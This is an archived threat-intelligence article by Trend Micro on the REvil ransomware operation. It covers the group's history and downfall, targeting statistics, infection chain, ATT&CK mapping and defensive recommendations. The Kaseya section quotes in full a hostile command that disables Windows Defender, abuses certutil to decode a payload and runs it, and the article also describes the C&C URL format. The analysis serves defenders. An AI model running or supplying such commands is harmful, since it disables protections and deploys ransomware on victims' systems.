Ransomware Spotlight: REvil
Archived: 2026-04-05 14:09:02 UTC
Water Mare: REvil behind the scenes
The connection between Water Mare and REvil dates back to April 2019, its first confirmed deployment. In June 2019, it
was advertised by an actor with the username UNKN or Unknown (the same as REvil’s) on the XSS forum. It operated as an
affiliate service: Affiliates spread the ransomware to victims while REvil operators maintained the malware and payment
infrastructure.
In 2020, Water Mare acquired new capabilities and accesses that would be used in future attacks thanks to its affiliates.
These capabilities include the PE injection capability using a PowerShell and the credential stealer KPOT stealer, which
UNKN won in an auction for its source code. Affiliates also offered access to company networks and a VPN server. Around
this time UNKN also made efforts to limit affiliates to Russian-speaking members to prevent intrusion.
2021 was a series of highs and lows for Water Mare, culminating in the arrest of several affiliates and the close
documentation of REvil’s downfall. The early part of the year promised new developments such as the aforementioned plans
for  distributed denial-of-service (DDoS) attacks, which would have ushered in triple extortion tactics. However, REvil’s
biggest attacks — those that hit JBS and Kaseya — pushed law enforcement agencies to close in on the group’s heels.
FBI later attributed the Kaseya and JBS attacks to the Water Mare intrusion set. They reportedly gained access to the Water
Mare intrusion set’s servers and retrieved the master key for REvil, which was provided to Kaseya. Around the same time,
distrust for the threat group began to take root, with an affiliate claiming to have been bypassed in the negotiation process
using a backdoor, foreshadowing REvil’s unraveling.
Despite announcing its return in September, by October 2021 Water Mare’s data leak program became inaccessible and the
affiliate program terminated. Suspected Water Mare affiliates were also being arrested or tracked down, thanks to the efforts
of global law enforcement agencies.
The future of REvil operators
Ultimately, REvil’s activities placed it at the top of the list of ransomware operators that governments were eager to crack
down on. In a global effort, law enforcement went after REvil operators both offline and online, leading to the shutdown of
its operations and actual arrests.
Based on our findings from Water Mare, it is unlikely that the intrusion set will resurface under the name REvil because of
the amount of negative publicity this moniker had received given the following points:
Affiliates doubted REvil's operations. The nature of REvil’s shutdown pointed to law enforcement and reports of a
backdoor that cheated them from ransom negotiations. Ultimately, this cast considerable doubt on the group’s
credibility among threat actors.
REvil lacked leadership with the disappearance of UNKN. 0_neday, UNKN’s successor, was unable to inspire
renewed confidence in REvil operations. In contrast to UNKN’s efforts to prevent infiltration, 0_neday made serious
errors, such as failing to generate new private keys to the restored data leak site.
REvil operated with reduced membership, which led to its shutdown. Efforts to attract affiliates again (such as
modifying affiliate profit cut to 90%) backfired, as these efforts were likely interpreted by other threat actors as a
final desperate measure.
We surmise that the group can persist by rebranding, which is a common tactic among ransomware operators and which has
been done by the group before. Case in point, DarkSide has renamed itself as BlackMatter. Meanwhile, REVil’s affiliates are
likely to move to other ransomware operators, if they have not done so already. As for its operators, it is probable that they
will continue to work or move to other ransomware operations, bringing their techniques with them. Therefore, for
organizations wondering what’s next, there is still great value in understanding REvil tactics, techniques, and procedures
(TTPs).
An overview of REvil operations
One aspect that made REvil’s operation infamous was its heavy extortion tacticsnews- cybercrime-and-digital-threats. As
mentioned earlier, operators behind the ransomware group considered DDoS and got in touch directly with customers,
business partners, and the media to pressure victims into paying the ransom. They also auctioned stolen data to place more
duress on their victims.
REvil is also known for being an example of highly targeted ransomware, as it utilized tools based on its operators’ high-level knowledge of their targeted entities. This resulted in a varied arsenal and customized infection chains, as we elaborate
on later.
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 1 of 7

To this end, REvil used tools like FileZilla to exfiltrate data and PsExec to propagate and remotely execute the ransomware
and other files. It also used other tools and malware such as PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a trojan used to deliver ransomware.
Top affected industries and counties
As our detections show, REvil attacks were concentrated largely in the US, followed by Mexico and Germany by a wide
margin. This is consistent with evidence found in the code of REvil that purposely excludes countries in the Commonwealth
of Independent States (CIS) as its targets. 
Figure 1. Countries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure
We saw the most REvil-related detections in the transportation industry, followed by the financial sector. In our reportnews-cybercrime-and-digital-threats summarizing ransomware activity in the first half of 2021, transportation was already among
the top three most targeted sectors, likely for its role in the supply chain and logistics. In general, the top targeted sectors are
all critical industries, further emphasizing how REvil had been operating especially in 2021.
Figure 2. Industries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro Smart Protection Network infrastructure
Infection chains and techniques
Due to its targeted nature, REvil used a variety of tools and malware depending what the situation dictated. Its operators
appeared to operate on a high-level of knowledge on their victim’s environment, as evidenced by the level of customization
in its attacks. 
Initial Access
The threat actors behind REvil hired a variety of affiliates for their initial access. These ranged from those with malspam
emails with spear-phishing links or attachments, RDP access and use of valid accounts, compromised websites, and exploits.
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 2 of 7

These tactics then led to the download and execution of the payload using normal binaries like CertUtil, PowerShell, or via
macro. Threat actors could also take on a more targeted approach by using RDP and PsExec to take control of the network
and then deploy the payload. Another recently observed initial access is also possible via supply chain compromise, which
could lead to the installation of Sodinstall or Sodinokibi, as observed in the Kaseya incident. 
Download and Execution
Here are some of the common ways the payload was downloaded and executed, based on what was observed and reported
previously: 
CVE-2019-2725open on a new tab led to the remote code execution (RCE) of CertUtil or PowerShell to download
and execute REvil. There are also instances where REvil was loaded in memory of PowerShell via reflective load
instead of executing a binary.
Malspam led to a macro that is used to download and execute REvil and malspam with an attachment (such as a
PDF) that might drop or download Qakbot in order to download additional components or payloads.
Drive-by compromise directly led to REvil. 
CVE-2018-13379open on a new tab, CVE-2019-11510open on a new tab, and valid accounts led to RDP and PsExec,
then to the dropping and execution of other components like the antivirus, exfiltration tools, and finally, REvil.
• Another execution method was through DLL sideloading. This method used a legitimate executable such as
MsMpeng.exe to load the REvil DLL that is named as a legitimate DLL like MpSvc.dll that is dropped by a custom
installer detected as “SODINSTALL.”
CVE-2021-30116, a zero-day vulnerability affecting the Kaseya VSA servers, was also used in the Kaseya supply
chain compromise. The payload was dropped to Kaseya's TempPath with the file name agent.exe. The VSA
procedure used to deploy the encryptor was named "Kaseya VSA Agent Hot-fix.” The "Kaseya VSA Agent Hot-fix”
procedure ran the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring
$true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true
-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo
%RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & del /q /f
c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe”
Lateral Movement
This happened in the more targeted attack flow where the attackers made use of RDP and PsExec for lateral
movement. This is also where the ransomware and its other components were dropped and executed.
Discovery
REvil was also known for using network discovery tools such as AdFind, SharpSploit, BloodHound, and NBTScan.
These tools were observed in recent REvil attacks.
Defense Evasion
PC Hunter and Process Hacker were observed to be present in the monitored campaigns and can be used to discover
and terminate services and processes to disable antivirus products. These are among the legitimate toolsnews-cybercrime-and-digital-threats commonly weaponized by modern ransomware. 
KillAV, meanwhile, is a custom malicious binary designed to uninstall antivirus-related products by either querying
the uninstall registry and uninstalling the program associated, or by terminating processes from its list. 
A new variant of REvil included a Safeboot routine in its arsenal, which is triggered when “-smode” is supplied as
argument for the new variant. These new variants created various RunOnce registries to restart from or to Safemode
and bypass security solutions that do not work under Safemode, before proceeding unhindered with its encryption
routine. 
Aside from execution, the DLL sideloading could also be used to evade detection by running under the context of a
legitimate file or process.
In the Kaseya supply chain compromise, PowerShell commands that were used to disable Windows Defender were
also observed.
Credential Access, Exfiltration
SharpSploit was observed to be one of the tools recently used. This is an attack framework with credential access
capabilities using Mimikatz module.
Gathered information was then sent back to the actors via different methods that were observed, such as the
installation of FileZilla to facilitate an FTP transfer, or the use of third-party sync tools like MegaSync, FreeFileSync
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 3 of 7

and Rclone (64-bit).
Command and Control
REvil would send a report and system info to its C&C, which was done by generating a pseudorandom URL based on a
fixed format and generation to add to a list of domains in its configuration. The URLs followed this format:
https://{Domain}/{String 1}/{String 2}/{random characters}.{String 3}
The domain and the strings here meant the following: 
Domain: from a list based on the configuration 
String 1: wp-content, include, content, uploads, static, admin, data, or news 
String 2: images, pictures, image, temp, tmp, graphic, assets, or pics 
String 3: jpg, png, gif
Impact
The impact and encryption process itself did not much since its inception.
It tried to escalate its privilege via an exploit (code is in the binary) or a token impersonation and create a mutex.
It decrypted its JSON config from one of its sections to learn how it would proceed with its routines. This
configuration file was an encrypted JSON file located in a section of the decrypted binary. It would be decrypted
using the RC4 function. The JSON file contained the following configuration:
pk → base64 public encryption key of attacker
pid → personal id of the actor
sub → campaign id
dbg → debug mode
fast → fast mode
wipe → enable wipe of specific directories
wht → whitelist dictionary
fld → whitelisted folders
fls → whitelisted filenames
ext → whitelisted file extensions
wfld → directories to wipe
prc → processes to kill before the encryption
dmn → domains to contact after encryption
net → send HTTP POST request to domains
nbody → base64 encoded ransom note body
nname → ransom note file name
exp → run exploit if true
img → base64 encoded message on desktop background
svc → terminated services
Examples of these routines included processes to terminate, C&C to report to, and extension to use, among others.
It would then check the keyboard layout or the language of the affected system and avoid a certain list of countries. 
Afterward, it would create registry entries for keys, file extensions, and the stats after encryption. 
The payload would then proceed with its encryption routine, which would be based on the configuration for files to
encrypt, keys to use, processes or directories to terminate or delete, ransom note information, C&C domains, and
others. 
Lastly, it would proceed with deleting backups like shadow copies and report to its C&C the status of the infection.
MITRE tactics and techniques
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 4 of 7

Initial
Access
Execution Persistence Privilege Escalation
Defense
Evasion
Discovery
Credential
Access
Lateral
Movement
T1566 -
Phishing
Arrives via
phishing
emails,
sometimes
with Qakbot
or IcedID
T1190 -
Exploit
public-facing
application
Arrives via
any the
following
exploits:•
CVE-2018-
13379• CVE-2019-2725•
CVE-2019-
11510• CVE-2021-30116
T1189 -
Drive-by
compromise
Makes use of
compromise
websites like
forums to
download
REvil when
accessed
T1195 -
Supply chain
compromise
Compromised
Kaseya VSA
servers were
used to push
out REvil to
victims.
T1078 -
Valid
accounts
Have been
reported to
make used of
compromised
accounts to
access
victims via
RDP or
RMMs
T1106 - Execution
through API
Uses native API to
execute various
commands/routines
T1059  -
Command and
scripting
interpreter
Uses various
scripting
interpreters like
PowerShell,
Windows command
shell and Visual
Basic (macro in
documents)
T1129  - Shared
modules
Made use of DLL
sideloading to
execute REvil
DLLs
T1204 - User
execution
User execution is
needed to carry
out the payload
from the spear-phishing
link/attachments.
T1547  -
Boot or logon
autostart
execution
Creates
registry run
entries for
restarting in
safe mode
T1574 -
Hijack
execution
flow
Hijacks the
normal
execution of
MsMpeng.exe
and
MpSvc.dll via
DLL-sideloading
technique
T1134 - Access token
manipulation
Uses
ImpersonateLoggedOnUser
API to impersonate the
security context of the user
who is logged in 
T1068 - Exploitation for
privilege escalation
Makes use of CVE-2018-
8453 to escalate privilege
T1574 - Hijack execution
flow
Depending on the privilege
context of the normal
executable file being
abused, might also be used
for privilege escalation
T1027 -
Obfuscated
files or
information
Some
variants
(or its
config) are
obfuscated
to make
detection
more
difficult.
Some
variants
have a
custom
packer to
make
analysis or
detection
more
difficult.
T1562 -
Impair
defenses
Disables
security-related
software by
running in
safe mode
or
terminating
them
T1574 -
Hijack
execution
flow
DLL
sideloading
can also be
used as a
form of
defense
evasion. 
T1083 - File
and directory
discovery
Searches for
specific files
and directory
related to its
encryption
T1018 -
Remote system
discovery
Makes use of
tools for
network scans
T1057 -
 Process
discovery
Discovers
certain
processes for
process
termination
T1082 -
 System
information
discovery
Identifies
keyboard
layout and
other system
information
T1012 - Query
registry
Queries
certain
registries as
part of its
routine
T1063 -
 Security
software
discovery
Discovers
security
software for
reconnaissance
and
termination
T1003 - OS
credential
dumping
Might
utilize tools
like
SharpSploit,
which
contains
Mimikatz
module
T1552 -
Unsecured
credentials
Might
utilize tools
like
SharpSploit,
which
contains
Mimikatz
module 
T1570 -
Lateral too
transfer
Can make
use of RDP
or SMB
admin
shares via
PsExec to
transfer the
ransomwar
or tools
within the
network
Summary of malware, tools, and exploits used
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 5 of 7

Security teams can watch out for the presence of the following malware tools and exploits that are typically used in REvil
attacks:
Initial Entry Execution Discovery
Privilege
Escalation
Credential Access
Lateral
Movement
Defense Evasion
Phishing
emails
Exploits:
CVE-2018-
13379
CVE-2019-
2725
CVE-2019-
11510
CVE-2021-
30116
Sodinstall
(DLL
sideloading)
Qakbot
IcedID
Netscan.exe
NBTScan
AdFind
BloodHound
SharpSploit
KillAV
CVE-2018-
8453
Sodinstall
(DLL
sideloading)
SharpSploit
RDP
PsExec
KillAV
Process
Hacker
PC Hunte
Sodinstal
(DLL
sideloadin
Recommendations
While REvil operations have been shut down, it is likely that organizations, government bodies, and perhaps even ordinary
consumers will not easily forget the consequences of its attack. Affiliates that have been involved in the attack could take up
other ransomware operators, while REvil TTPs can be mimicked in newer campaigns. In the meantime, during the current
shutdown, it is a good opportunity to learn from REvil as the group lies low.
To help defend systems against similar threats, organizations can establish security frameworks that can allocate resources
systematically for establishing a solid defense against ransomware.
Here are some best practices that can be included in these frameworks:
Audit and inventory
Take an inventory of assets and data.
Identify authorized and unauthorized devices and software.
Make an audit of event and incident logs.
Configure and monitor
Manage hardware and software configurations.
Grant admin privileges and access only when necessary to an employee’s role.
Monitor network ports, protocols, and services.
Activate security configurations on network infrastructure devices such as firewalls and routers.
Establish a software allow list that only executes legitimate applications.
Patch and update
Conduct regular vulnerability assessments.
Perform patching or virtual patching for operating systems and applications.
Update software and applications to their latest versions.
Protect and recover
Implement data protection, backup, and recovery measures.
Enable multifactor authentication (MFA).
Secure and defend
Employ sandbox analysis to block malicious emails.
Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and
network.
Detect early signs of an attack such as the presence of suspicious tools in the system.
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 6 of 7

Use advanced detection technologies such as those powered by AI and machine learning.
Train and test
Regularly train and assess employees on security skills.
Conduct red-team exercises and penetration tests.
A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and
network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.
Trend Micro Vision One™products provides multilayered protection and behavior detection, which helps block
questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
Trend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that
exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine
learning. 
Trend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis
techniques to effectively block malicious emails, including phishing emails that can serve as entry points for
ransomware.
Trend Micro Apex One™products offers next-level automated threat detection and response against advanced
concerns such as fileless threats and ransomware, ensuring the protection of endpoints.
Indicators of Compromise
The IOCs for this article can be found hereopen on a new tab. Actual indicators might vary per attack.
HIDE
Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page
(Ctrl+V).
Image will appear the same size as you see above.
We Recommend
The Industrialization of Botnets: Automation and Scale as a New Threat Infrastructurenews article
Complexity and Visibility Gaps in Power Automatenews article
Cracking the Isolation: Novel Docker Desktop VM Escape Techniques Under WSL2news article
Azure Control Plane Threat Detection With TrendAI Vision One™news article
The AI-fication of Cyberthreats: Trend Micro Security Predictions for 2026predictions
Ransomware Spotlight: DragonForcenews article
Stay Ahead of AI Threats: Secure LLM Applications With Trend Vision Onenews article
The Road to Agentic AI: Navigating Architecture, Threats, and Solutionsnews article
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Page 7 of 7